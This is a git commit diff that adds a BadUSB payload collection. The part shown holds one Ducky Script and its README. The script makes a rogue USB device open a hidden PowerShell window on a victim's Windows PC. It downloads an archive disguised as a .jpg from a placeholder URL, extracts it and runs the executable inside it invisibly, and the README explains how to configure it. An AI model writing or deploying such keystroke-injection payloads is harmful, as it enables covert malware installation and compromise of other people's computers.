Adding lost UNC0V3R3D BadUSB Collection

This commit is contained in:
UberGuidoZ
2024-04-15 23:47:39 -07:00
parent 06c3423537
commit 103d83bf76
155 changed files with 5841 additions and 0 deletions
@@ -0,0 +1,17 @@
REM Author: hell0
REM Description: Downloads an .zip file from the URL, extract and runs it on the target pc.
REM Version: 1.0
REM Category: Execution
REM Target: All Windows
DELAY 500
GUI d
DELAY 500
GUI r
DELAY 500
STRING powershell.exe
ENTER
DELAY 2000
STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://yoursite.com/zipfile.jpg' -OutFile 'zipfile.zip'; Expand-Archive zipfile.zip; Start-Process -FilePath '.\zipfile\your_executable.exe'; exit" -WindowStyle Hidden; exit
ENTER
DELAY 500
GUI d
@@ -0,0 +1,47 @@
# Invisible_DownExec_Zip_Extract
This script invisibly downloads an .zip file from the URL, extracts and runs it on the target pc.
## How to use?
This script is not plug and play. You will have to do the following changes:
- change url for the .zip file "-Uri 'https://yoursite.com/zipfile.jpg'"
- change name of the .zip file "-OutFile 'zipfile.zip'"
- change path of the .exe in the extracted folder "-FilePath '.\zipfile\your_executable.exe'"
## Features
- open powershell invisble
- download .zip from url
- extract .zip file
- run exe from .zip file
## Feedback
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
## Support
For support, contact me via Discord "UNC0V3R3D#8662".
## Meta
- If you want to sponsor me on Patreon, the link is on my profile.